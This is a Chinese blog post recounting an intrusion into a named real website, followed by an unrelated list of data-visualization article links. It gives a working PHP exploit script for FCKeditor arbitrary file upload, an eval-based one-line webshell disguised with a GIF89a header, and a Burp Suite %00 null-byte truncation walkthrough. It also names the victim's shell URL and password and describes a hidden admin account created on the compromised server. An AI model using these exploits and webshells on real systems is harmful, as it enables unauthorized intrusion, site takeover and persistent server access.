百度360必应搜狗淘宝本站头条
当前位置:网站首页 > 热门文章 > 正文

实例 burpsuite 突破上传绕过入侵服务器

bigegpt 2024-09-18 07:53 23 浏览

一般有这个安全码的,都会比较难爆破。

第一种:本地构造上传表单。

用御剑扫描一下它的后台目录,图中看到了上传页面。

Filedata函数未变量。

写一份上传表单:

-------------------------------------------------------------------------------------------------------------------------------------------------------------------------

<html><head>

<title>上载文件表单</title></head>

<body>

<form enctype="multipart/form-data" action="" method="post">

请选择文件: <br>

<input name="upload_frle" type="file"><br>

<input type="submit" value="上传文件">

</form>

</body>

</html>

-------------------------------------------------------------------------------------------------------------------------------------------------------------------------

把以上保存为htm文件格式。

双击打开。

上传我们的图片一句话木马。

shell连接,拿下网站。

*************************************************************************************************************************************************************************

第二种方法:Fckeditor编辑器Getshell。

本次需要在PHP环境下运行。

http://www.****.net/ntbkwl/editor/editor/filemanager/ ; 响应403

http://www.****.net/ntbkwl/fckeditor/editor/fckeditor.html ; 响应200

经过测试,这个网站装有两个fckeditor编辑器。

响应200的是精简版的编辑器,没有什么可以利用的。

我们要针对的是响应403的这个目录。

把以下脚本保存为laoren.php

-------------------------------------------------------------------------------------------------------------------------------------------------------------------------

<?php

error_reporting(0);

set_time_limit(0);

ini_set("default_socket_timeout", 5);

define(STDIN, fopen("php://stdin", "r"));

$match = array();

function http_send($host, $packet)

{

$sock = fsockopen($host, 80);

while (!$sock)

{

print "\n[-] No response from {$host}:80 Trying again...";

$sock = fsockopen($host, 80);

}

fputs($sock, $packet);

while (!feof($sock)) $resp .= fread($sock, 1024);

fclose($sock);

print $resp;

return $resp;

}

function connector_response($html)

{

global $match;

return (preg_match("/OnUploadCompleted\((\d),\"(.*)\"\)/", $html, $match) && in_array($match[1], array(0, 201)));

}

print "\n+------------------------------------------------------------------+";

print "\n| FCKEditor Servelet Arbitrary File Upload Exploit by Wolegequ |";

print "\n+------------------------------------------------------------------+\n";

if ($argc < 3)

{

print "\nUsage......: php $argv[0] host path\n";

print "\nExample....: php $argv[0] localhost /\n";

print "\nExample....: php $argv[0] localhost /FCKEditor/\n";

die();

}

$host = $argv[1];

$path = ereg_replace("(/){2,}", "/", $argv[2]);

$filename = "laoren.gif";

$foldername = "laoren.php%00.gif";

$connector = "editor/filemanager/connectors/php/connector.php";

$payload = "-----------------------------265001916915724\r\n";

$payload .= "Content-Disposition: form-data; name=\"NewFile\"; filename=\"{$filename}\"\r\n";

$payload .= "Content-Type: image/jpeg\r\n\r\n";

$payload .= 'GIF89a'."\r\n".'<?php eval($_POST[laoren]) ?>'."\n";

$payload .= "-----------------------------265001916915724--\r\n";

$packet = "POST {$path}{$connector}?Command=FileUpload&Type=Image&CurrentFolder=".$foldername." HTTP/1.0\r\n";

//print $packet;

$packet .= "Host: {$host}\r\n";

$packet .= "Content-Type: multipart/form-data; boundary=---------------------------265001916915724\r\n";

$packet .= "Content-Length: ".strlen($payload)."\r\n";

$packet .= "Connection: close\r\n\r\n";

$packet .= $payload;

print $packet;

if (!connector_response(http_send($host, $packet))) die("\n[-] Upload failed!\n");

else print "\n[-] Job done! try http://${host}/$match[2] \n";

?>

-------------------------------------------------------------------------------------------------------------------------------------------------------------------------

这个脚本很简单,就是模拟一个POST数据包提交。

把这个脚本保存为laoren.php放到PHP环境中。

/ntbkwl/editor/ 这个是这个网站编辑器的目录。

getshell 执行成功会在 /Ntbkwl/uploadfile/image/ 这个目录下生成我们的一句话木马,命名为laoren.php

http://www.gytv.net//Ntbkwl/uploadfile/image/laoren.php ; 这个就是我们的一句话木马,密码为laoren

成功拿下这个网站的管理权限。

*************************************************************************************************************************************************************************

接下来是第三种方法,burpsuite %00截断。

这一种是针对手头上没有PHP环境上用的。

得到403的目录是 /ntbkwl/editor/

用到的工具是:Fckeidtor编辑漏洞利用工具

http://www.****.net/ntbkwl/editor//editor/filemanager/connectors/test.html

编辑器的上传页面。

用把以下代码保存为hk.jpg

-------------------------------------------------------------------------------------------------------------------------------------------------------------------------GIF89a

<?php eval($_POST[laoren]);?>

-------------------------------------------------------------------------------------------------------------------------------------------------------------------------

GIF89a这个是图片的头文件,一定要加上,达到图片欺骗上传。

把hk.jpg上传到网站上面。

开启浏览器的8080本地代理端口,用burpsuite的Proxy功能抓一下包。

把抓取到的数据包发送到Repeater中。

currentFolder=%2F

修改为

currentFolder=laoren.php%00

一定要加个%00,才能从这里截断。

点击GO一下。

/Ntbkwl/uploadfile/file/laoren.php

这个就是一句话木马的路径了。

访问一下。

http://www.***.net//Ntbkwl/uploadfile/file/laoren.php

可以访问。

成功拿下webshell。

*************************************************************************************************************************************************************************

OK,拿下了这网站。

接下来就是这台服务器。

看到这里,应该知道我是怎么拿下这台服务器的吧。

这是我建立的账号laoren$

这是服务器网站的目录,总共19个网站。

可以解析的到。

Q9300 酷睿2四核 。

4G内存。

OK。

相关推荐

方差分析简介(方差分析通俗理解)

介绍方差分析(ANOVA,AnalysisofVariance)是一种广泛使用的统计方法,用于比较两个或多个组之间的均值。单因素方差分析是方差分析的一种变体,旨在检测三个或更多分类组的均值是否存在...

正如404页面所预示,猴子正成为断网元凶--吧嗒吧嗒真好吃

吧嗒吧嗒,绘图:MakiNaro你可以通过加热、冰冻、水淹、模塑、甚至压溃压力来使网络光缆硬化。但用猴子显然是不行的。光缆那新挤压成型的塑料外皮太尼玛诱人了,无法阻挡一场试吃盛宴的举行。印度政府正...

Python数据可视化:箱线图多种库画法

概念箱线图通过数据的四分位数来展示数据的分布情况。例如:数据的中心位置,数据间的离散程度,是否有异常值等。把数据从小到大进行排列并等分成四份,第一分位数(Q1),第二分位数(Q2)和第三分位数(Q3)...

多组独立(完全随机设计)样本秩和检验的SPSS操作教程及结果解读

作者/风仕在上一期,我们已经讲完了两组独立样本秩和检验的SPSS操作教程及结果解读,这期开始讲多组独立样本秩和检验,我们主要从多组独立样本秩和检验介绍、两组独立样本秩和检验使用条件及案例的SPSS操作...

方差分析 in R语言 and Excel(方差分析r语言例题)

今天来写一篇实际中比较实用的分析方法,方差分析。通过方差分析,我们可以确定组别之间的差异是否超出了由于随机因素引起的差异范围。方差分析分为单因素方差分析和多因素方差分析,这一篇先介绍一下单因素方差分析...

可视化:前端数据可视化插件大盘点 图表/图谱/地图/关系图

前端数据可视化插件大盘点图表/图谱/地图/关系图全有在大数据时代,很多时候我们需要在网页中显示数据统计报表,从而能很直观地了解数据的走向,开发人员很多时候需要使用图表来表现一些数据。随着Web技术的...

matplotlib 必知的 15 个图(matplotlib各种图)

施工专题,我已完成20篇,施工系列几乎覆盖Python完整技术栈,目标只总结实践中最实用的东西,直击问题本质,快速帮助读者们入门和进阶:1我的施工计划2数字专题3字符串专题4列表专题5流程控制专题6编...

R ggplot2常用图表绘制指南(ggplot2绘制折线图)

ggplot2是R语言中强大的数据可视化包,基于“图形语法”(GrammarofGraphics),通过分层方式构建图表。以下是常用图表命令的详细指南,涵盖基本语法、常见图表类型及示例,适合...

Python数据可视化:从Pandas基础到Seaborn高级应用

数据可视化是数据分析中不可或缺的一环,它能帮助我们直观理解数据模式和趋势。本文将全面介绍Python中最常用的三种可视化方法。Pandas内置绘图功能Pandas基于Matplotlib提供了简洁的绘...

Python 数据可视化常用命令备忘录

本文提供了一个全面的Python数据可视化备忘单,适用于探索性数据分析(EDA)。该备忘单涵盖了单变量分析、双变量分析、多变量分析、时间序列分析、文本数据分析、可视化定制以及保存与显示等内容。所...

统计图的种类(统计图的种类及特点图片)

统计图是利用几何图形或具体事物的形象和地图等形式来表现社会经济现象数量特征和数量关系的图形。以下是几种常见的统计图类型及其适用场景:1.条形图(BarChart)条形图是用矩形条的高度或长度来表示...

实测,大模型谁更懂数据可视化?(数据可视化和可视化分析的主要模型)

大家好,我是Ai学习的老章看论文时,经常看到漂亮的图表,很多不知道是用什么工具绘制的,或者很想复刻类似图表。实测,大模型LaTeX公式识别,出乎预料前文,我用Kimi、Qwen-3-235B...

通过AI提示词让Deepseek快速生成各种类型的图表制作

在数据分析和可视化领域,图表是传达信息的重要工具。然而,传统图表制作往往需要专业的软件和一定的技术知识。本文将介绍如何通过AI提示词,利用Deepseek快速生成各种类型的图表,包括柱状图、折线图、饼...

数据可视化:解析箱线图(box plot)

箱线图/盒须图(boxplot)是数据分布的图形表示,由五个摘要组成:最小值、第一四分位数(25th百分位数)、中位数、第三四分位数(75th百分位数)和最大值。箱子代表四分位距(IQR)。IQR是...

[seaborn] seaborn学习笔记1-箱形图Boxplot

1箱形图Boxplot(代码下载)Boxplot可能是最常见的图形类型之一。它能够很好表示数据中的分布规律。箱型图方框的末尾显示了上下四分位数。极线显示最高和最低值,不包括异常值。seaborn中...